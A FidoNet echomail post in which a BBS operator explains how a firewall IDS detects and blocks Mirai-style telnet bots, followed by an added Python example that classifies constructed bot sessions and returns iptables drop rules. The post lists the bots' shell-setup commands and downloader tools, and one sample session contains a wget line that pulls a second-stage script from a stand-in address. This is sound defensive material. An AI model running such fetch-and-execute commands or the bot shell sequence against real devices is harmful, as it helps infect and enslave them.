| echo: | |
|---|---|
| to: | |
| from: | |
| date: | |
| subject: | Bug in Renegade`s Renemail |
On 2018 Jun 26 15:09:12, you wrote to Sean Dennis:
NA> If a non-ANSI user calls here, I know that 99% of the time it's a
NA> script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If
NA> you answer wrong, your IP address is blacklisted in the NET2BBS "kill"
NA> file. A blacklisted system is trapped and disconnected before the BBS
NA> loads. I write a separate process that resets the kill file once a
NA> week in the case of a false-positive.
that's similar to what i do here except i use an IDS on my firewall... ISP
issued modems are shit... just barely enough to call them a
modem/firewall/router... we use ours in bridge mode and have our own
dedicated firewall/router machine protecting the three networks here...
this firewall being one of smoothwall, ipfire, pfSense and similar... we
chose ours because we can customize it if we choose... the IDS comes with
but the automated dropping of unwanted connections is our custom
addition...
since i have frontdoor running and answering the connection requests on
telnet, it answers and logs the "DFRS" (data from ring signal)...
that should be the caller-id stuff but on telnet, with these automated
mirai variants, they just spew their credentials and then try to set up
their shell... it is because of frontdoor that i was able to see what was
going on... most bbses hide that data... so anyway, once i knew what was
going on, i wrote a few IDS rules to detect these connections... i followed
a few rules, though...
1. we don't care what name and password they spew.
2. we DO care if they try to set up their shell.
3. shell setup is generally always the same
enable.system.shell.sh
(dots used for spaces so as to not trip IDS)
4. after the above they generally try to load busybox
with some fake module or program call. this call
is simply a delimiter so they can see when their
attempt is finished.
5. sometimes, instead of loading busybox, they try
to download scripts from somewhere else via tools
like fgrep, curl, wget, ftpget, tftp, and even echo.
so with the above, we have five IDS rules... one to detect each stage of
the command shell setup attempt... that's really all it takes but we do
track the fake module or program names they try to initiate... that's how
the thing got its name and how the skiddies keep them separated...
in 2016, there were 12 unique variants.
in 2017, there were 30 new unique variants.
in 2018, there have been at least 73 new unique variants.
the most notable thing is that by running the IDS, we're able to detect
these attempts and stop them in the firewall before they even get a chance
to get into the network... sure, the initial part is being fed to the
mailer but as soon as the IDS qualifies the traffic as a mirai variant, it
drops the connection via iptables rules... right now we have rules for each
of the unique modules which we used as our trigger to block the connection
but it is just about to the point where we don't even care about them any
more... we could drop the connection just based on the attempt to set up
the shell which would reduce our rule set to only 4 rules instead of the
current 115 we have in place...
there used to be a lot more attempts as the skiddies attempted to build
their botnets... those attempts have dropped a lot since the beginning...
there's only maybe 5 unique variants that are active... at least going by
what is seen over here... sometimes an older one will come around and we
still see some mirai attempts... one of the funniest ones is using
"anarchy" as their fake module but the actual funny part is
they're trying to load "SH" for their shell instead of
"sh"... we all know how *nix systems are case sensitive so we
know this won't work but it could be a second round attempt where the first
round may have gotten in and created a "SH" shell... i dunno but
i'm glad to be having my firewall performing this analysis and blocking
rather than submitting my server to the abuse... that one IDS installation
on the firewall is protecting a number of bbses and they're very happy they
don't have to do the work of analyzing and blocking these skiddie
attempts...
at one point in time, our firewall was blocking over 4000 unique IPs that
were known to be infected with a mirai variant... the attempts have fallen
off a whole lot and today we're tracking less than 1000 unique IPs hitting
here... i want to suspect the skids are actually reading their logs and
seeing what BBS and mailer logons look like... i want to suspect they are
adjusting their code to detect those and drop the connection on their own
since they can't get in and do anything... i dunno... maybe it is all just
a dream...
)\/(ark
Always Mount a Scratch Monkey
Do you manage your own servers? If you are not running an IDS/IPS yer doin'
it wrong...
... be kind to your four footed friends...
---
* Origin: (1:3634/12.73)
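The staged detection the post describes (ignore the credential spew, trigger on the enable/system/shell/sh sequence, record the bogus busybox "module" name used as a delimiter, note any downloader tool, then drop the source address in the firewall) is easy to prototype offline. The following is an added example written for this page, not the poster's IDS rules or any product's code. It assumes a session log with one telnet command per line, a hypothetical `KNOWN_MODULES` block list (only "anarchy" comes from the post; "TESTMOD" is constructed), constructed sessions using TEST-NET addresses, and an iptables rule that is returned as a string rather than executed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Stage 2/3 of the post: the shell-setup sequence, one command per line.
SHELL_SETUP = ("enable", "system", "shell", "sh")
# Stage 4: busybox called with a bogus applet name that serves as a delimiter.
BUSYBOX_RE = re.compile(r"^(?:/bin/)?busybox\s+([A-Za-z0-9_.-]+)\s*$")
# Stage 5: tools the post lists for pulling a second-stage script.
DOWNLOADERS = ("wget", "curl", "tftp", "ftpget", "fgrep", "echo")
# Hypothetical per-module block list; the post's "115 rules" approach.
KNOWN_MODULES = {"ANARCHY"}


@dataclass
class Verdict:
    ip: str
    shell_setup: bool          # enable/system/shell/sh seen in order
    module: Optional[str]      # fake busybox applet name, if any
    downloader: Optional[str]  # first downloader tool seen after setup
    block: bool
    reason: str


def _shell_setup_index(cmds):
    """Index of the command completing SHELL_SETUP as an in-order
    subsequence, or None. Case-insensitive so the 'SH' variant the post
    mentions is still caught even though it would fail on a real box."""
    want = 0
    for i, c in enumerate(cmds):
        if c.lower() == SHELL_SETUP[want]:
            want += 1
            if want == len(SHELL_SETUP):
                return i
    return None


def classify_session(ip, lines, policy="shell"):
    """policy='shell': drop on the setup sequence alone (the post's 4-rule
    idea). policy='module': drop only when the busybox token is on the list."""
    cmds = [l.strip() for l in lines if l.strip()]
    end = _shell_setup_index(cmds)
    if end is None:
        # Rule 1: whatever name/password was spewed is irrelevant.
        return Verdict(ip, False, None, None, False, "no shell-setup sequence")
    module = downloader = None
    for c in cmds[end + 1:]:
        m = BUSYBOX_RE.match(c)
        if m and module is None:
            module = m.group(1)
        tool = c.split(None, 1)[0]
        if tool in DOWNLOADERS and downloader is None:
            downloader = tool
    if policy == "shell":
        return Verdict(ip, True, module, downloader, True, "shell-setup sequence")
    if module in KNOWN_MODULES:
        return Verdict(ip, True, module, downloader, True, f"known module {module}")
    return Verdict(ip, True, module, downloader, False, "setup seen, module not listed")


def drop_rule(verdict):
    """Firewall action for a blocked session (iptables syntax, returned only)."""
    if not verdict.block:
        return None
    return f"iptables -I INPUT -s {verdict.ip} -p tcp --dport 23 -j DROP"


# Constructed sessions: two bot-style attempts and one ordinary BBS caller.
SESSIONS = {
    "203.0.113.7": ["root", "password", "enable", "system", "shell", "sh",
                    "/bin/busybox ANARCHY", "wget http://192.0.2.10/stage2.sh"],
    "198.51.100.23": ["admin", "admin", "enable", "system", "shell", "SH",
                      "/bin/busybox TESTMOD"],
    "192.0.2.5": ["sysop", "secret", "M", "R", "G"],
}


def run_all(sessions, policy="shell"):
    return {ip: classify_session(ip, lines, policy) for ip, lines in sessions.items()}


if __name__ == "__main__":
    for v in run_all(SESSIONS).values():
        print(v.ip, v.reason, v.module, v.downloader, drop_rule(v))
```

Running it with the default policy blocks both bot sessions and leaves the BBS caller alone; switching to `policy="module"` blocks only the "ANARCHY" session, which is the trade-off the post describes between a small rule set and per-variant tracking.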
SOURCE: echomail via fidonet.ozzmosis.com